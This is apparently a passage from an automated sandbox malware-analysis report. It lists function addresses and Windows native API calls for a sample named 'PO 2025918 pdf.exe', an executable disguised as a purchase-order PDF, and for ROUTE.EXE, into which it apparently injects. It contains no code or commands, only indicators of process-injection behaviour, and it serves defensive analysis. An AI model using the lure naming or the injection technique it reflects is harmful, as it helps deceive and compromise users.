                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D3010 NtOpenDirectoryObject,5_2_016D3010
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D3090 NtSetValueKey,5_2_016D3090
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D39B0 NtGetContextThread,5_2_016D39B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D3D70 NtOpenThread,5_2_016D3D70
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D3D10 NtOpenProcessToken,5_2_016D3D10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03084340 NtSetContextThread,LdrInitializeThunk,8_2_03084340
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03084650 NtSuspendThread,LdrInitializeThunk,8_2_03084650
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082B60 NtClose,LdrInitializeThunk,8_2_03082B60
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03082BA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03082BE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03082BF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082AD0 NtReadFile,LdrInitializeThunk,8_2_03082AD0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082AF0 NtWriteFile,LdrInitializeThunk,8_2_03082AF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082F30 NtCreateSection,LdrInitializeThunk,8_2_03082F30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082FB0 NtResumeThread,LdrInitializeThunk,8_2_03082FB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082FE0 NtCreateFile,LdrInitializeThunk,8_2_03082FE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03082E80
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03082EE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03082D10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03082D30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082DD0 NtDelayExecution,LdrInitializeThunk,8_2_03082DD0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03082DF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082C60 NtCreateKey,LdrInitializeThunk,8_2_03082C60
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03082C70
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03082CA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030835C0 NtCreateMutant,LdrInitializeThunk,8_2_030835C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030839B0 NtGetContextThread,LdrInitializeThunk,8_2_030839B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082B80 NtQueryInformationFile,8_2_03082B80
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082AB0 NtWaitForSingleObject,8_2_03082AB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082F60 NtCreateProcessEx,8_2_03082F60
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082F90 NtProtectVirtualMemory,8_2_03082F90
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082FA0 NtQuerySection,8_2_03082FA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082E30 NtWriteVirtualMemory,8_2_03082E30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082EA0 NtAdjustPrivilegesToken,8_2_03082EA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082D00 NtSetInformationFile,8_2_03082D00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082DB0 NtEnumerateKey,8_2_03082DB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082C00 NtQueryInformationProcess,8_2_03082C00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082CC0 NtQueryVirtualMemory,8_2_03082CC0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03082CF0 NtOpenProcess,8_2_03082CF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03083010 NtOpenDirectoryObject,8_2_03083010
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03083090 NtSetValueKey,8_2_03083090
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03083D10 NtOpenProcessToken,8_2_03083D10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03083D70 NtOpenThread,8_2_03083D70
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02849340 NtReadFile,8_2_02849340
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_028491D0 NtCreateFile,8_2_028491D0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02849640 NtAllocateVirtualMemory,8_2_02849640
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_028494D0 NtClose,8_2_028494D0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02849430 NtDeleteFile,8_2_02849430
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_01A042040_2_01A04204
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_01A070180_2_01A07018
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_01A0D8EC0_2_01A0D8EC
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_07C24A500_2_07C24A50
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_09329CD80_2_09329CD8
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_093260200_2_09326020
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_0932D9D80_2_0932D9D8
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_0932CD300_2_0932CD30
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_09323F700_2_09323F70
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_09323F600_2_09323F60
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_0932D1680_2_0932D168
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_093251800_2_09325180
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_0932600F0_2_0932600F
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_0932F5700_2_0932F570
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_0932F55F0_2_0932F55F
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_0932D5A00_2_0932D5A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_0932D5900_2_0932D590
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_0932A6F20_2_0932A6F2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004188C35_2_004188C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004100DA5_2_004100DA
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004100E35_2_004100E3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004012405_2_00401240
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004032305_2_00403230
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00416AD05_2_00416AD0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00416AD35_2_00416AD3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0040E2E35_2_0040E2E3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00401B405_2_00401B40
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004103035_2_00410303
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00401B365_2_00401B36
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0040E4275_2_0040E427
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0040E4335_2_0040E433
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0040264C5_2_0040264C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004026505_2_00402650
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004026695_2_00402669
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0042EFC35_2_0042EFC3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017281585_2_01728158
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016901005_2_01690100
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173A1185_2_0173A118
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017581CC5_2_017581CC
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017601AA5_2_017601AA
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017320005_2_01732000
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175A3525_2_0175A352
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017603E65_2_017603E6
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AE3F05_2_016AE3F0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017402745_2_01740274
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017202C05_2_017202C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A05355_2_016A0535
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017605915_2_01760591
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017524465_2_01752446
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0174E4F65_2_0174E4F6
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A07705_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C47505_2_016C4750
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169C7C05_2_0169C7C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BC6E05_2_016BC6E0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B69625_2_016B6962
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A05_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0176A9A65_2_0176A9A6
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A28405_2_016A2840
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AA8405_2_016AA840
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE8F05_2_016CE8F0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016868B85_2_016868B8
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175AB405_2_0175AB40
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01756BD75_2_01756BD7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169EA805_2_0169EA80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AAD005_2_016AAD00
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169ADE05_2_0169ADE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B8DBF5_2_016B8DBF
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0C005_2_016A0C00
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01690CF25_2_01690CF2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01740CB55_2_01740CB5
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01714F405_2_01714F40
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016E2F285_2_016E2F28
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C0F305_2_016C0F30
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016ACFE05_2_016ACFE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01692FC85_2_01692FC8
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171EFA05_2_0171EFA0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0E595_2_016A0E59
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175EE265_2_0175EE26
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175EEDB5_2_0175EEDB
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175CE935_2_0175CE93
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B2E905_2_016B2E90
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D516C5_2_016D516C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168F1725_2_0168F172
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0176B16B5_2_0176B16B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AB1B05_2_016AB1B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175F0E05_2_0175F0E0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017570E95_2_017570E9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A70C05_2_016A70C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0174F0CC5_2_0174F0CC
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168D34C5_2_0168D34C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175132D5_2_0175132D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016E739A5_2_016E739A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017412ED5_2_017412ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BB2C05_2_016BB2C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A52A05_2_016A52A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017575715_2_01757571
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173D5B05_2_0173D5B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016914605_2_01691460
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175F43F5_2_0175F43F
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175F7B05_2_0175F7B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017516CC5_2_017516CC
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A99505_2_016A9950
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BB9505_2_016BB950
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170D8005_2_0170D800
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A38E05_2_016A38E0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175FB765_2_0175FB76
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01715BF05_2_01715BF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016DDBF95_2_016DDBF9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BFB805_2_016BFB80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01713A6C5_2_01713A6C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01757A465_2_01757A46
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175FA495_2_0175FA49
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0174DAC65_2_0174DAC6
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016E5AA05_2_016E5AA0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173DAAC5_2_0173DAAC
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01757D735_2_01757D73
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A3D405_2_016A3D40
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01751D5A5_2_01751D5A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BFDC05_2_016BFDC0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01719C325_2_01719C32
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175FCF25_2_0175FCF2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175FF095_2_0175FF09
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175FFB15_2_0175FFB1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A1F925_2_016A1F92
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A9EB05_2_016A9EB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310A3528_2_0310A352
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0305E3F08_2_0305E3F0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031103E68_2_031103E6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030F02748_2_030F0274
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030D02C08_2_030D02C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030401008_2_03040100
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030EA1188_2_030EA118
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030D81588_2_030D8158
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031041A28_2_031041A2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031101AA8_2_031101AA
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031081CC8_2_031081CC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030E20008_2_030E2000
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030747508_2_03074750
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030507708_2_03050770
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0304C7C08_2_0304C7C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0306C6E08_2_0306C6E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030505358_2_03050535
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031105918_2_03110591
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030F44208_2_030F4420
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031024468_2_03102446
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030FE4F68_2_030FE4F6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310AB408_2_0310AB40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03106BD78_2_03106BD7
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0304EA808_2_0304EA80
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030669628_2_03066962
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030529A08_2_030529A0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0311A9A68_2_0311A9A6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030528408_2_03052840
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0305A8408_2_0305A840
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030368B88_2_030368B8
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0307E8F08_2_0307E8F0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03092F288_2_03092F28
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03070F308_2_03070F30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030F2F308_2_030F2F30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030C4F408_2_030C4F40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030CEFA08_2_030CEFA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03042FC88_2_03042FC8
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0305CFE08_2_0305CFE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310EE268_2_0310EE26
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03050E598_2_03050E59
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310CE938_2_0310CE93
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03062E908_2_03062E90
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310EEDB8_2_0310EEDB
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0305AD008_2_0305AD00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030ECD1F8_2_030ECD1F
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03068DBF8_2_03068DBF
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0304ADE08_2_0304ADE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03050C008_2_03050C00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030F0CB58_2_030F0CB5
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03040CF28_2_03040CF2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310132D8_2_0310132D
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0303D34C8_2_0303D34C
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0309739A8_2_0309739A
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030552A08_2_030552A0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0306B2C08_2_0306B2C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030F12ED8_2_030F12ED
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0308516C8_2_0308516C
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0303F1728_2_0303F172
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0311B16B8_2_0311B16B
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0305B1B08_2_0305B1B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030FF0CC8_2_030FF0CC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030570C08_2_030570C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310F0E08_2_0310F0E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031070E98_2_031070E9
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310F7B08_2_0310F7B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030956308_2_03095630
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031016CC8_2_031016CC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031075718_2_03107571
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030ED5B08_2_030ED5B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031195C38_2_031195C3
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310F43F8_2_0310F43F
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030414608_2_03041460
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310FB768_2_0310FB76
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0306FB808_2_0306FB80
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0308DBF98_2_0308DBF9
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030C5BF08_2_030C5BF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03107A468_2_03107A46
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310FA498_2_0310FA49
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030C3A6C8_2_030C3A6C
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030EDAAC8_2_030EDAAC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03095AA08_2_03095AA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030F1AA38_2_030F1AA3
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030FDAC68_2_030FDAC6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030E59108_2_030E5910
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030599508_2_03059950
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0306B9508_2_0306B950
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030BD8008_2_030BD800
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030538E08_2_030538E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310FF098_2_0310FF09
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03051F928_2_03051F92
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310FFB18_2_0310FFB1
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03013FD28_2_03013FD2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03013FD58_2_03013FD5
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03059EB08_2_03059EB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03053D408_2_03053D40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03101D5A8_2_03101D5A
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03107D738_2_03107D73
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0306FDC08_2_0306FDC0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030C9C328_2_030C9C32
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310FCF28_2_0310FCF2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02831D308_2_02831D30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282CBE78_2_0282CBE7
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282CBF08_2_0282CBF0
